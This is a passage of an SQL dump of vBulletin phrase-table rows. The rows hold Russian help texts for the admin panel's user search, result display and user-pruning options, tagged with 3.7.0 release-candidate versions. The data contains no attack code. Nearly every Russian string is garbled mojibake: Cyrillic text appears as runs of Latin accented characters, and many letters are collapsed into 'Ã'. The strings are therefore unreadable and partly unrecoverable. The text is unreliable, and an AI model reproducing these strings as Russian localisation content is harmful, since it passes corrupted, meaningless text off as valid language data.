1205431035, '3.7.0 Release Candidate 1'),
(24377, -1, 'user_modify_lastpostafter_title', 'cphelptext', 'ÃîñëåäÃåå ñîîáùåÃèå ïîñëå', 'vbulletin', '', 0, ''),
(24378, -1, 'user_modify_lastpostbefore_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, äà òà è âðåìÿ ïîñëåäÃåãî ñîîáùåÃèÿ êîòîðûõ ÄÎ óêà çà ÃÃîé äà òû. Ôîðìà ò äà òû è âðåìåÃè - ãããã-ìì-ää ÷÷:ìì:ññ; Ãà ïðèìåð, 2005-02-26 21:45:00 Ãà éäåò âñåõ ïîëüçîâà òåëåé, êòî îñòà âëÿë ñâîè ñîîáùåÃèÿ äî 21:45 ìèÃóò 26 ôåâðà ëÿ 2005 ã. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"ÃîñëåäÃåå ñîîáùåÃèå ïîñëå\" äëÿ ïîèñêà îïðåäåë¸ÃÃîãî ïðîìåæóòêà âðåìåÃè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äà òà äîëæÃà áûòü ÃÎÑËÅ äà òû, óêà çà ÃÃîé â \"ÃîñëåäÃåå ñîîáùåÃèå ïîñëå\" (Ñì. ÃîñëåäÃåå ñîîáùåÃèå ïîñëå )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24379, -1, 'user_modify_lastpostbefore_title', 'cphelptext', 'ÃîñëåäÃåå ñîîáùåÃèå äî', 'vbulletin', '', 0, ''),
(24380, -1, 'user_modify_birthdayafter_text', 'cphelptext', 'Îïöèÿ ïîèñêà ïîëüçîâà òåëåé ÑÒÀÃØÅ îïðåäåëåÃÃîãî âîçðà ñòà , äà òà ðîæäåÃèÿ Ãà éäåÃÃûõ ïîëüçîâà òåëåé áóäåò ïîçæå óêà çà ÃÃîé çäåñü äà òû. Ôîðìà ò äà òû - ãããã-ìì-ää; Ãà ïðèìåð, 2005-02-27. Ãîëüçîâà òåëè ñ Ãåóêà çà ÃÃûìè äÃÿìè ðîæäåÃèÿ áóäóò à âòîìà òè÷åñêè èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Ãòîò ïà ðà ìåòð ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ ïà ðà ìåòðîì \"ÄåÃü ðîæäåÃèÿ äî\" äëÿ ïîèñêà ïîëüçîâà òåëåé îïðåäåë¸ÃÃîãî âîçðà ñòà . ÃîìÃèòå, ÷òî åñëè âû èñïîëüçóåòå îáà ïà ðà ìåòðà , òî ýòà äà òà äîëæÃà áûòü ÄÎ äà òû, óêà çà ÃÃîé â \"ÄåÃü ðîæäåÃèÿ äî\". (Ñì. ÄåÃü ðîæäåÃèÿ äî )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24381, -1, 'user_modify_birthdayafter_title', 'cphelptext', 'ÄåÃü ðîæäåÃèÿ ïîñëå', 'vbulletin', '', 0, ''),
(24382, -1, 'user_modify_birthdaybefore_text', 'cphelptext', 'Îïöèÿ ïîèñêà ïîëüçîâà òåëåé ÌÎËÎÆÅ îïðåäåëåÃÃîãî âîçðà ñòà , äà òà ðîæäåÃèÿ Ãà éäåÃÃûõ ïîëüçîâà òåëåé áóäåò ðà Ãüøå óêà çà ÃÃîé çäåñü äà òû. Ôîðìà ò äà òû - ãããã-ìì-ää; Ãà ïðèìåð, 2005-02-27. Ãòîò ïà ðà ìåòð ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ ïà ðà ìåòðîì \"ÄåÃü ðîæäåÃèÿ ïîñëå\" äëÿ ïîèñêà ïîëüçîâà òåëåé îïðåäåëåÃÃîãî âîçðà ñòà . ÃîìÃèòå, ÷òî åñëè âû èñïîëüçóåòå îáà ýòè ïà ðà ìåòðà , ýòà äà òà äîëæÃà áûòü ÃÎÇÆÅ äà òû, óêà çà ÃÃîé â \"ÄåÃü ðîæäåÃèÿ ïîñëå\". (Ñì. ÄåÃü ðîæäåÃèÿ ïîñëå )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24383, -1, 'user_modify_birthdaybefore_title', 'cphelptext', 'ÄåÃü ðîæäåÃèÿ äî', 'vbulletin', '', 0, ''),
(24384, -1, 'user_modify_postslower_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå ðà çìåñòèëè áîëåå èëè ðà âÃîå óêà çà ÃÃîìó çäåñü ÷èñëó êîëè÷åñòâî ñîîáùåÃèé. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"ÑîîáùåÃèé ìåÃüøå ÷åì\". Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòî ÷èñëî äîëæÃà áûòü ÌÅÃÜØÅ èëè ÃÀÂÃÃŽ ÷èñëó, óêà çà ÃÃîãî â \"ÑîîáùåÃèé ìåÃüøå ÷åì\" ', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24385, -1, 'user_modify_postslower_title', 'cphelptext', 'ÑîîáùåÃèé áîëüøå èëè ðà âÃî', 'vbulletin', '', 0, ''),
(24386, -1, 'user_modify_postsupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå ðà çìåñòèëè ìåÃåå, ÷åì óêà çà ÃÃîå çäåñü ÷èñëî ñîîáùåÃèé. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"ÑîîáùåÃèé áîëüøå èëè ðà âÃî ÷åì\". Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòî ÷èñëî äîëæÃî áûòü ÃÎËÜØÅ ÷èñëà , óêà çà ÃÃîãî â \"ÑîîáùåÃèé áîëüøå èëè ðà âÃî ÷åì\" .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24387, -1, 'user_modify_postsupper_title', 'cphelptext', 'ÑîîáùåÃèé ìåÃüøå', 'vbulletin', '', 0, ''),
(24388, -1, 'user_modify_reputationlower_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò ðåïóòà öèþ áîëüøóþ èëè ðà âÃóþ óêà çà ÃÃîìó çäåñü ÷èñëó. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"Ãåïóòà öèÿ ìåÃüøå ÷åì\", ÷òîáû çà äà òü ïðîìåæóòîê ðåïóòà öèè. ÃîìÃèòå, ÷òî åñëè âû èñïîëüçóåòå îáà êðèòåðèÿ, òî ÷èñëî â äà ÃÃîì ïîëå äîëæÃî áûòü ÌÅÃÜØÅ, ÷åì ÷èñëî â ïîëå \"Ãåïóòà öèÿ ìåÃüøå ÷åì\", èÃà ÷å âû ÃÃ¥ Ãà éä¸òå Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. Ãåïóòà öèÿ ìåÃüøå ÷åì )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24389, -1, 'user_modify_reputationlower_title', 'cphelptext', 'Ãåïóòà öèÿ áîëüøå èëè ðà âÃà ÷åì', 'vbulletin', '', 0, ''),
(24390, -1, 'user_modify_reputationupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò ðåïóòà öèþ ìåÃüøå, ÷åì óêà çà ÃÃîå ÷èñëî. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"Ãåïóòà öèÿ áîëüøå èëè ðà âÃà ÷åì\". Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòî ÷èñëî äîëæÃà áûòü ÃÎËÜØÅ ÷èñëà , óêà çà ÃÃîãî â \"Ãåïóòà öèÿ áîëüøå èëè ðà âÃà ÷åì\" .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24391, -1, 'user_modify_reputationupper_title', 'cphelptext', 'Ãåïóòà öèÿ ìåÃüøå ÷åì', 'vbulletin', '', 0, ''),
(24392, -1, 'user_modify_ipaddress_text', 'cphelptext', 'Ââåäèòå â ýòîì ïîëå IP-à äðåñ. Ãòî ìîæåò áûòü ïîëÃûé IP-à äðåñ (Ãà ïðèìåð, 188.77.39.33) èëè ÷à ñòè÷Ãûé (Ãà ïðèìåð, 188.77.39).  ñëó÷à å ââîäà ÷à ñòè÷Ãîãî à äðåñà , ðåçóëüòà òîì ïîèñêà áóäóò ïîëüçîâà òåëè ñ ëþáûìè ÷èñëà ìè â ïîñëåäÃåì îêòåòå (áëîêå) IP-à äðåñà .', 'vbulletin', '', 0, ''),
(24393, -1, 'user_modify_ipaddress_title', 'cphelptext', 'Ñîñòà âëÿþùèå IP-à äðåñà ', 'vbulletin', '', 0, ''),
(24394, -1, 'user_modify_warningslower_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò ïðåäóïðåæäåÃèé áîëüøå èëè ñòîëüêî æå, ñêîëüêî óêà çà Ãî çäåñü.', 'vbulletin', 'zCarot', 1207659868, '3.7.0 Release Candidate 3'),
(24395, -1, 'user_modify_warningslower_title', 'cphelptext', 'Êîëè÷åñòâî ïðåäóïðåæäåÃèé áîëüøå èëè ðà âÃî', 'vbulletin', 'zCarot', 1207659868, '3.7.0 Release Candidate 3'),
(24396, -1, 'user_modify_warningsupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò ïðåäóïðåæäåÃèé ìåÃüøå, ÷åì óêà çà Ãî çäåñü.', 'vbulletin', 'zCarot', 1207659890, '3.7.0 Release Candidate 3'),
(24397, -1, 'user_modify_warningsupper_title', 'cphelptext', 'Êîëè÷åñòâî ïðåäóïðåæäåÃèé ìåÃüøå ÷åì', 'vbulletin', 'zCarot', 1207659890, '3.7.0 Release Candidate 3'),
(24398, -1, 'user_modify_infractionslower_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò Ãà ðóøåÃèé áîëüøå èëè ñòîëüêî æå, ñêîëüêî óêà çà Ãî çäåñü.', 'vbulletin', 'zCarot', 1207659912, '3.7.0 Release Candidate 3'),
(24399, -1, 'user_modify_infractionslower_title', 'cphelptext', 'Êîëè÷åñòâî Ãà ðóøåÃèé áîëüøå èëè ðà âÃî', 'vbulletin', 'zCarot', 1207659912, '3.7.0 Release Candidate 3'),
(24400, -1, 'user_modify_infractionsupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò Ãà ðóøåÃèé ìåÃüøå, ÷åì óêà çà Ãî çäåñü.', 'vbulletin', 'zCarot', 1207659934, '3.7.0 Release Candidate 3'),
(24401, -1, 'user_modify_infractionsupper_title', 'cphelptext', 'Êîëè÷åñòâî Ãà ðóøåÃèé ìåÃüøå ÷åì', 'vbulletin', 'zCarot', 1207659934, '3.7.0 Release Candidate 3'),
(24402, -1, 'user_modify_pointslower_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò áà ëëîâ Ãà ðóøåÃèé áîëüøå èëè ñòîëüêî æå, ñêîëüêî óêà çà Ãî çäåñü.', 'vbulletin', 'zCarot', 1207908457, '3.7.0 Release Candidate 4'),
(24403, -1, 'user_modify_pointslower_title', 'cphelptext', 'Êîëè÷åñòâî áà ëëîâ Ãà ðóøåÃèé áîëüøå èëè ðà âÃî', 'vbulletin', 'zCarot', 1207659992, '3.7.0 Release Candidate 3'),
(24404, -1, 'user_modify_pointsupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò áà ëëîâ Ãà ðóøåÃèé ìåÃüøå, ÷åì óêà çà Ãî çäåñü.', 'vbulletin', 'zCarot', 1207660011, '3.7.0 Release Candidate 3'),
(24405, -1, 'user_modify_pointsupper_title', 'cphelptext', 'Êîëè÷åñòâî áà ëëîâ Ãà ðóøåÃèé ìåÃüøå ÷åì', 'vbulletin', 'zCarot', 1207660011, '3.7.0 Release Candidate 3'),
(24406, -1, 'user_modify_display[username]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ èìÿ êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24407, -1, 'user_modify_display[username]_title', 'cphelptext', 'Ãîêà çûâà òü èìÿ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24408, -1, 'user_modify_useridlower_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò èäåÃòèôèêà òîð (ID) áîëüøå èëè ðà âÃûé, óêà çà ÃÃîìó çäåñü.', 'vbulletin', 'zCarot', 1207660072, '3.7.0 Release Candidate 3'),
(24409, -1, 'user_modify_useridlower_title', 'cphelptext', 'Ãîìåð (ID) ïîëüçîâà òåëÿ áîëüøå èëè ðà âåÃ', 'vbulletin', 'zCarot', 1207660072, '3.7.0 Release Candidate 3'),
(24410, -1, 'user_modify_useridupper_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, êîòîðûå èìåþò èäåÃòèôèêà òîð (ID) ìåÃüøå, ÷åì óêà çà Ãî çäåñü.', 'vbulletin', 'zCarot', 1207660131, '3.7.0 Release Candidate 3'),
(24411, -1, 'user_modify_useridupper_title', 'cphelptext', 'Ãîìåð (ID) ïîëüçîâà òåëÿ ìåÃüøå', 'vbulletin', 'zCarot', 1207660131, '3.7.0 Release Candidate 3'),
(24412, -1, 'user_modify_display[options]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ ìåÃþ îïöèé äëÿ êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24413, -1, 'user_modify_display[options]_title', 'cphelptext', 'Îïöèè ïðîñìîòðà ', 'vbulletin', '', 0, ''),
(24414, -1, 'user_modify_display[usergroup]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ ãðóïïà êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24415, -1, 'user_modify_display[usergroup]_title', 'cphelptext', 'Ãîêà çûâà òü ãðóïïû ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24416, -1, 'user_modify_display[email]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ à äðåñ ýëåêòðîÃÃîé ïî÷òû ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24417, -1, 'user_modify_display[email]_title', 'cphelptext', 'Ãîêà çûâà òü à äðåñ ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(24418, -1, 'user_modify_display[parentemail]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ à äðåñ ýëåêòðîÃÃîé ïî÷òû ðîäèòåëåé êà æäîãî ïîëüçîâà òåëÿ (åñëè îà óêà çà Ã).', 'vbulletin', '', 0, ''),
(24419, -1, 'user_modify_display[parentemail]_title', 'cphelptext', 'Ãîêà çûâà òü à äðåñ ýëåêòðîÃÃîé ïî÷òû ðîäèòåëåé', 'vbulletin', '', 0, ''),
(24420, -1, 'user_modify_display[coppauser]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \" â ðåçóëüòà òà õ ïîèñêà áóäåò ïîìå÷à òüñÿ, ÿâëÿåòñÿ ëè ÷åëîâåê COPPA ïîëüçîâà òåëåì èëè Ãåò.', 'vbulletin', '', 0, ''),
(24421, -1, 'user_modify_display[coppauser]_title', 'cphelptext', 'Ãîêà çûâà òü ïîëüçîâà òåëÿ COPPA', 'vbulletin', '', 0, ''),
(24422, -1, 'user_modify_display[homepage]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäóò îòîáðà æà òüñÿ äîìà øÃèå ñòðà Ãèöû ïîëüçîâà òåëåé (åñëè óêà çà Ãû).', 'vbulletin', '', 0, ''),
(24423, -1, 'user_modify_display[homepage]_title', 'cphelptext', 'Ãîêà çûâà òü äîìà øÃþþ ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(24424, -1, 'user_modify_display[icq]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ Ãîìåð ICQ êà æäîãî ïîëüçîâà òåëÿ (åñëè óêà çà Ã).', 'vbulletin', '', 0, ''),
(24425, -1, 'user_modify_display[icq]_title', 'cphelptext', 'Ãîêà çûâà òü Ãîìåð ICQ', 'vbulletin', '', 0, ''),
(24426, -1, 'user_modify_display[aim]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäóò îòîáðà æà òüñÿ èìåÃà AIM êà æäîãî ïîëüçîâà òåëÿ (åñëè óêà çà Ãî).', 'vbulletin', '', 0, ''),
(24427, -1, 'user_modify_display[aim]_title', 'cphelptext', 'Ãîêà çûâà òü èìÿ AIM ', 'vbulletin', '', 0, ''),
(24428, -1, 'user_modify_display[yahoo]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ Ãîìåð Yahoo! êà æäîãî ïîëüçîâà òåëÿ (åñëè óêà çà Ã).', 'vbulletin', '', 0, ''),
(24429, -1, 'user_modify_display[yahoo]_title', 'cphelptext', 'Ãîêà çûâà òü Ãîìåð Yahoo!', 'vbulletin', '', 0, ''),
(24430, -1, 'user_modify_display[msn]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ èìÿ MSN êà æäîãî ïîëüçîâà òåëÿ (åñëè óêà çà Ãî).', 'vbulletin', '', 0, ''),
(24431, -1, 'user_modify_display[msn]_title', 'cphelptext', 'Ãîêà çûâà òü èìÿ MSN', 'vbulletin', '', 0, ''),
(24432, -1, 'user_modify_display[signature]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ ïîäïèñü êà æäîãî ïîëüçîâà òåëÿ (åñëè îÃà åñòü).', 'vbulletin', '', 0, ''),
(24433, -1, 'user_modify_display[signature]_title', 'cphelptext', 'Ãîêà çûâà òü ïîäïèñü', 'vbulletin', '', 0, ''),
(24434, -1, 'user_modify_display[usertitle]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ ñòà òóñ êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24435, -1, 'user_modify_display[usertitle]_title', 'cphelptext', 'Ãîêà çûâà òü ñòà òóñ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24436, -1, 'user_modify_display[joindate]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ äà òà ðåãèñòðà öèè êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24437, -1, 'user_modify_display[joindate]_title', 'cphelptext', 'Ãîêà çûâà òü äà òó ðåãèñòðà öèè', 'vbulletin', '', 0, ''),
(24438, -1, 'user_modify_display[lastactivity]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ äà òà ïîñëåäÃåé à êòèâÃîñòè êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24439, -1, 'user_modify_display[lastactivity]_title', 'cphelptext', 'Ãîêà çûâà òü ïîñëåäÃþþ à êòèâÃîñòü', 'vbulletin', '', 0, ''),
(24440, -1, 'user_modify_display[lastpost]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ äà òà ïîñëåäÃåãî ñîîáùåÃèÿ êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24441, -1, 'user_modify_display[lastpost]_title', 'cphelptext', 'Ãîêà çûâà òü ïîñëåäÃåå ñîîáùåÃèå', 'vbulletin', '', 0, ''),
(24442, -1, 'user_modify_display[posts]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ ñ÷¸ò÷èê ñîîáùåÃèé êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24443, -1, 'user_modify_display[posts]_title', 'cphelptext', 'Ãîêà çûâà òü ñ÷¸ò÷èê ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(24444, -1, 'user_modify_display[reputation]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ ðåïóòà öèÿ êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24445, -1, 'user_modify_display[reputation]_title', 'cphelptext', 'Ãîêà çûâà òü ðåïóòà öèþ', 'vbulletin', '', 0, ''),
(24446, -1, 'user_modify_display[ipaddress]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ IP à äðåñ êà æäîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24447, -1, 'user_modify_display[ipaddress]_title', 'cphelptext', 'Ãîêà çûâà òü IP à äðåñ', 'vbulletin', '', 0, ''),
(24448, -1, 'user_modify_display[birthday]_text', 'cphelptext', 'Ãðè óñòà Ãîâêå ýòîé îïöèè â \"Äà \", â ðåçóëüòà òà õ ïîèñêà áóäåò îòîáðà æà òüñÿ äåÃü ðîæäåÃèÿ êà æäîãî ïîëüçîâà òåëÿ (åñëè óêà çà à â ïðîôèëå).', 'vbulletin', '', 0, ''),
(24449, -1, 'user_modify_display[birthday]_title', 'cphelptext', 'Ãîêà çûâà òü äåÃü ðîæäåÃèÿ', 'vbulletin', '', 0, ''),
(24450, -1, 'user_modify_orderby_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò óêà çà òü ïîðÿäîê ñîðòèðîâêè ðåçóëüòà òîâ ïîèñêà .', 'vbulletin', '', 0, ''),
(24451, -1, 'user_modify_orderby_title', 'cphelptext', 'Ñîðòèðîâêà ïî', 'vbulletin', '', 0, ''),
(24452, -1, 'user_modify_limitstart_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âà ì Ãà ÷à òü ñïèñîê ðåçóëüòà òîâ ÃÃ¥ ñ ïåðâîé, à ñ ëþáîé ïîñëåäóþùåé Ãà éäåÃÃîé çà ïèñè. \r\nÃà ïðèìåð, åñëè â ðåçóëüòà òå ïîèñêà Ãà éäåÃî 50 çà ïèñåé, Ãî âû óêà çà ëè Ãà ÷à òü ñ 25-é, òî ñòðà Ãèöà ñ ðåçóëüòà òà ìè ïîêà æåò òîëüêî çà ïèñè ñ 25 ïî 50.', 'vbulletin', '', 0, ''),
(24453, -1, 'user_modify_limitstart_title', 'cphelptext', 'Ãà ÷à òü ñ ðåçóëüòà òà ', 'vbulletin', '', 0, ''),
(24454, -1, 'user_modify_limitnumber_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò îãðà Ãè÷èòü êîëè÷åñòâî ðåçóëüòà òîâ. \r\nÃà ïðèìåð, åñëè â ðåçóëüòà òå ïîèñêà Ãà éäåÃî 50 çà ïèñåé, Ãî âû îãðà Ãè÷èëè êîëè÷åñòâî ðåçóëüòà òîâ 25-þ, òî ñòðà Ãèöà ñ ðåçóëüòà òà ìè ïîêà æåò òîëüêî 25, Ãà ÷èÃà ÿ ñ Ãîìåðà , óêà çà ÃÃîãî â ïðåäûäóùåé Ãà ñòðîéêå.', 'vbulletin', '', 0, ''),
(24455, -1, 'user_modify_limitnumber_title', 'cphelptext', 'Ìà êñèìóì ðåçóëüòà òîâ', 'vbulletin', '', 0, ''),
(24456, -1, 'user_prune_text', 'cphelptext', 'Ãòà ñèñòåìà ïîçâîëÿåò ìà ññîâî ïåðåìåùà òü ïîëüçîâà òåëåé â ðà çëè÷Ãûå ãðóïïû èëè óäà ëÿòü Ãåà êòèâÃûõ ïîëüçîâà òåëåé. Èñïîëüçóéòå ôîðìó Ãèæå, äëÿ âûáîðà óñëîâèé ïîèñêà ïîëüçîâà òåëåé. Ãî îêîÃֈ Ãèè ïîèñêà âû ñìîæåòå èÃäèâèäóà ëüÃî ïåðåìåùà òü èëè óäà ëÿòü îòîáðà ÃÃûõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24457, -1, 'user_prune_title', 'cphelptext', 'Ñèñòåìà ïåðåìåùåÃèÿ/óäà ëåÃèÿ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24458, -1, 'user_prune_usergroupid_text', 'cphelptext', 'Âûáåðèòå ãðóïïó ïîëüçîâà òåëåé, â êîòîðîé Ãåîáõîäèìî èñêà òü. Åñëè ïîëüçîâà òåëü ÃÃ¥ ïðèÃà äëåæèò óêà çà ÃÃîé ãðóïïå, îà ÃÃ¥ áóäåò îòîáðà æ¸à Ãà ñòðà Ãèöå ðåçóëüòà òîâ ïîèñêà .', 'vbulletin', '', 0, ''),
(24459, -1, 'user_prune_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24460, -1, 'user_prune_daysprune_text', 'cphelptext', 'Ãîëüçîâà òåëè, êîòîðûå ÃÃ¥ âõîäèëè Ãà ôîðóì êà ê ìèÃèìóì ýòî êîëè÷åñòâî äÃåé è ïðîøåäøèå ïî äðóãèì ïà ðà ìåòðà ì ïîèñêà , áóäóò îòîáðà æåÃû Ãà ñòðà Ãèöå ðåçóëüòà òîâ. Òà ê ìîæÃî âû÷èñëèòü Ãåà êòèâÃûõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24461, -1, 'user_prune_daysprune_title', 'cphelptext', 'ÃÃ¥ âõîäèë X äÃåé', 'vbulletin', '', 0, ''),
(24462, -1, 'user_prune_joindate_text', 'cphelptext', 'Âûáåðèòå ìåñÿö è ââåäèòå äâóçÃà ÷Ãûé äåÃü è ÷åòûðåõçÃà ÷Ãûé ãîä. Ãîëüçîâà òåëè, êîòîðûå çà ðåãèñòðèðîâà ëèñü äî ýòîé äà òû è ïðîøåäøèå ïî äðóãèì ïà ðà ìåòðà ì áóäóò îòîáðà æåÃû Ãà ñòðà Ãèöå ðåçóëüòà òîâ. Òà ê ìîæÃî âû÷èñëèòü ñòà ðûõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24463, -1, 'user_prune_joindate_title', 'cphelptext', 'Ãåãèñòðà öèÿ äî', 'vbulletin', '', 0, ''),
(24464, -1, 'user_prune_minposts_text', 'cphelptext', 'Ãîëüçîâà òåëè, ñ êîëè÷åñòâîì ñîîáùåÃèé ìåÃüøå, ÷åì ýòî ÷èñëî, è ïðîøåäøèå ïî äðóãèì ïà ðà ìåòðà ì áóäóò îòîáðà æåÃû Ãà ñòðà Ãèöå ðåçóëüòà òîâ. Òà ê ìîæÃî âû÷èñëèòü ïîëüçîâà òåëåé, êîòîðûå îñòà âëÿþò ìà ëî ñîîáùåÃèé.', 'vbulletin', '', 0, ''),
(24465, -1, 'user_prune_minposts_title', 'cphelptext', 'ÑîîáùåÃèé ìåÃüøå ÷åì', 'vbulletin', '', 0, ''),
(24466, -1, 'user_prune_order_text', 'cphelptext', 'Óêà æèòå, ïî êà êîìó ïà ðà ìåòðó áóäóò îòñîðòèðîâà Ãû ðåçóëüòà òû ïîèñêà .', 'vbulletin', '', 0, ''),
(24467, -1, 'user_prune_order_title', 'cphelptext', 'Ñîðòèðîâêà ïî', 'vbulletin', '', 0, ''),
